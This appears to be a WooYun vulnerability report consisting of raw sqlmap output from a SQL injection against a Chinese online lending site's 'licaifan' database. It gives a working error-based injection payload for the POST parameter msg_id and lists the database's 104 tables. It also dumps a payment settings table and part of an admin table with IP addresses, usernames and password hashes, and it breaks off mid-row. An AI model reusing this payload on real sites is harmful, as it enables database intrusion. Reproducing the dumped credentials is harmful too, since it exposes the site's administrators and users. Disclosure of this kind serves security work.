WooYun.org

Database: licaifan
[104 tables]
+--------------------------+
| YiiSession               |
| user                     |
| account                  |
| account_cash             |
| account_log_150202       |
| account_recharge         |
| adm_admin                |
| adm_award_log            |
| adm_company_users        |
| adm_email_template       |
| adm_login_record         |
| adm_logs                 |
| adm_other_type           |
| area                     |
| award_log                |
| card_auth                |
| consumer_credit_gain_log |
| consumer_invest_log      |
| cps_lanlicai             |
| error                    |
| exp_code                 |
| exp_winner               |
| frozen_log               |
| hlf                      |
| hlf_invest_detail_1900   |
| hlf_invest_log           |
| incubator_apply          |
| invest_bonus_log         |
| invest_bonus_log_bak     |
| invest_log               |
| invest_log_bak           |
| invest_view              |
| ios_download             |
| ios_push                 |
| lease_gain_log           |
| lease_invest_log         |
| lease_project            |
| lease_project_payment    |
| lease_project_repayment  |
| loan_application         |
| login_record             |
| meet_apply               |
| message                  |
| mobile_area              |
| mobile_change_log        |
| nation                   |
| net_invest_log           |
| oauth_access_tokens      |
| oauth_clients            |
| oauth_jwt                |
| oauth_refresh_tokens     |
| oauth_scopes             |
| oneYearCoupons           |
| payment                  |
| project_apply            |
| project_award            |
| project_comment          |
| project_company          |
| project_gain_record      |
| project_invest_record    |
| project_payment          |
| project_pic              |
| project_project          |
| project_related          |
| project_repayment        |
| project_transfer         |
| project_transfer2        |
| project_view             |
| project_vouch            |
| protected_answer         |
| protected_questions      |
| recharge_info_log        |
| redemption               |
| redemption_detail        |
| remindmsg_log            |
| research                 |
| score_log                |
| score_setting            |
| score_to_money           |
| service_log              |
| sms_code_check_record    |
| sms_send_log             |
| supertracker             |
| system_setting           |
| trade_gain_log           |
| trade_invest_log         |
| trade_project            |
| trade_project_payment    |
| trade_project_repayment  |
| transfer_available       |
| transfer_log             |
| upload_pic               |
| user_auth                |
| user_extend_mobile       |
| user_login_log           |
| user_qq_userinfo         |
| user_refer               |
| user_remind              |
| user_sina_userinfo       |
| user_tzj                 |
| user_weixin_userinfo     |
| vouch_pic                |
| whos_online              |
| withdraw_log             |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
Database: licaifan
Table: system_setting
[15 entries]
+----+-----------------------+----------+-------------+
| id | type                  | value    | description |
+----+-----------------------+----------+-------------+
| 1  | invest_threshold      | 1000     | 投资起点为1000元  |
| 2  | itemsPerPageInAccount | 10       | 账户管理每页显示个数  |
| 3  |                       | 10       | 消息每页显示个数    |
| 4  | announcement          | <blank>  | 网站公告        |
| 5  | minimum_withdraw      |          | 最低提现额度      |
| 6  | payment               | pay19    | 一九付         |
| 7  | lucky                 | 1403     | NULL        |
| 8  | withdraw_fee_type     |          | 提现手续费收取方式   |
| 9  | repayment             |          | 一九付         |
| 10 | wappayment            |          | 连连支付        |
| 11 | payment_bak           | shengpay |             |
| 12 | payment_verify        | llpay    | 连连支付        |
| 13 | apppayment            | wap      | 客户端充值渠道     |
| 14 | coupon_probability    | 100      | 周年红包活动中奖率   |
| 15 | withdraw_fee_number   | 3        | 免手续费提现次数    |
+----+-----------------------+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
Database: licaifan
Table: adm_admin
[36 entries]
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
| admin_id | addip           | status | addtime             | userName   | userPassword                             |
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
|          | 203.100.80.24   | 1      |                     | admin      |                                          |
| 1        | 106.185.46.44   | 1      |                     |            | 9f59c01c21bea721ca5cbba9984cd25e1c479a18 |
|          | 203.100.93.15   |        | 2014-10-29 10:05:22 |            |                                          |
|          | 203.100.93.15   |        |                     |            |                                          |
|          | 106.120.244.158 |        | 2014-09-29 18:11:27 |            |                                          |
| 1        |                 |        |                     |            | 79759dbab437869857f4443d81a3e25f9e9b2300 |
| 1        |                 |        |                     |            |                                          |
| 1        | 203.100.93.15   |        |                     |            |                                          |
| 1        |                 |        |                     |            |                                          |
|          |                 |        | 2015-02-15 11:15:53 | luoxin     |                                          |
|          |                 | 1      |